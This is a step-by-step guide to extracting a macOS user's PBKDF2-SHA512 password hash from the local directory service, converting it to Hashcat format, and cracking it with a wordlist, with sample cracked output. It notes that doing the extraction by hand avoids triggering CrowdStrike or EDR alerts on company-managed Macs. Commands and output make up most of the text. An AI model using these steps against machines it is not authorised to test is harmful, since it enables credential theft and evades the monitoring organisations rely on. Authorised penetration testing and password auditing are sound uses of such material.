Password Cracking
Once you have obtained the user's .plist file from /var/db/dslocal/nodes/Default/users/
you can extract the hash, and format an entry that Hashcat will understand. Modern macOS systems use a PBKDF2-SHA512
hash.
# Get the list of users (if needed)
dscl . -list /Users
# Read the ShadowHashData entry of their .plist file
sudo dscl . -read /Users/steve ShadowHashData >> newuser.hashdata
# Convert the data and write to a .plist file
cat newuser.hashdata | tail -n 1 | xxd -r -p | plutil -convert xml1 - -o newuser.plist
# View the data
cat newuser.plist
Manually convert the hash into Hashcat format for cracking
These steps are provided for manually extracting the hash, and creating a valid hash that can be cracked with Hashcat. In the next section, there is a script that is awesome and will perform this whole process for you and much quicker. Only problem with using this script is that if you macOS host is managed by a Company, the script will set off alarms from security tools such as CrowdStrike or EDR software. Doing this manually does not trip any alarms.
The Hashcat format that we need looks like this:
$ml$<iterations(integer)>$<salt(hex)>$<entropy(hex)>
Keyword | Description |
---|---|
iterations | This is a simple integer value |
salt | This value is in hex, and base64 encoded |
entropy | This value is in hex, and base64 encoded |
The data we are interested in is the SALTED-SHA512-PBKDF2
entry:
<key>SALTED-SHA512-PBKDF2</key>
<dict>
<key>entropy</key>
<data>
fN0UaJVva6Fbqjkfrwdem2jJJHsDilfZFs9U4mAdsptZLC6r/nKMVBIQH5IU
auXBW/E4PwGDsczqONxE2fUQ0dkOgAKRVwnAghsIjdYxLsuK8v49MfqYgHUm
+c2oWGC6odhO6KPBpSOSGTcuAuJh6s6db995GrN5eT/zbENFrDg=
</data>
<key>iterations</key>
<integer>123456</integer>
<key>salt</key>
<data>
2sVKYYXpCALwLH6uHzzeH/0KgaPbl++OW0baubgcJwo=
</data>
</dict>
The iteractions data is a simple integer value that we can just copy out for the Hashcat format.
After that, we will calculate the salt value and write it out to a file called salt
:
echo "2sVKYYXpCALwLH6uHzzeH/0KgaPbl++OW0baubgcJwo=" | base64 -D | xxd -p | tr -d \\n > salt
cat salt
dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a
Next, calculate the entropy value and write it out to a file called entropy
:
echo "fN0UaJVva6Fbqjkfrwdem2jJJHsDilfZFs9U4mAdsptZLC6r/nKMVBIQH5IUauXBW/E4PwGDsczqONxE2fUQ0dkOgAKRVwnAghsIjdYxLsuK8v49MfqYgHUm+c2oWGC6odhO6KPBpSOSGTcuAuJh6s6db995GrN5eT/zbENFrDg=" | base64 -D | xxd -p | tr -d \\n > entropy
cat entropy
7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38
Putting this together in the format mentioned in the beginning, the full value is. Save this out to a file called hash.txt
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38
Automated conversion of the hash into Hashcat format for cracking
This script will be detected by security software. Use at your own risk!
https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2
python3 osx_extract_hash.py username
This output will use the username as a prefix to the Hashcat format. Therefore, you will need to alter the Hashcat command to include the --username option. Review the header comments of the script for more information.
Run Hashcat to attempt cracking the password
Get the Hashcat mode for macOS. In this case, we need the PBKDF2-SHA512
mode of 7100
:
hashcat --help | grep -i macos
122 | macOS v10.4, macOS v10.5, macOS v10.6 | Operating System
1722 | macOS v10.7 | Operating System
7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System
Run hashcat to crack the password hash using a password list:
hashcat -a 0 -m 7100 hash.txt wordlist.txt
# or if you used the script:
hashcat -a 0 -m 7100 --username hash.txt wordlist.txt
Sample output:
(truncate data)
...
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38:P@ssw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7100 (macOS v10.8+ (PBKDF2-SHA512))
Hash.Target......: $ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3...45ac38
Time.Started.....: Sat Jan 4 12:30:15 2025 (22 secs)
Time.Estimated...: Sat Jan 4 12:30:37 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (password.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 0 H/s (0.95ms) @ Accel:96 Loops:8 Thr:32 Vec:1
Speed.#2.........: 0 H/s (0.00ms) @ Accel:64 Loops:128 Thr:128 Vec:1
Speed.#*.........: 0 H/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:123448-123455
Restore.Sub.#2...: Salt:0 Amplifier:0-0 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: password -> P@ssw0rd
Candidates.#2....: [Copying]
Hardware.Mon.#1..: Util: 81%
Hardware.Mon.#2..: Util: 0%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Sat Jan 4 12:29:46 2025
Stopped: Sat Jan 4 12:30:38 2025
Show the cracked password. The output will be in a formate of hash:password
. In this case the password is P@ssw0rd
.
hashcat -m 7100 hash.txt -a 0 password.lst --show
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38:P@ssw0rd
NOTE: It is recommended to perform only a wordlist attack since the time to perform a brute-force attack will take decades to complete.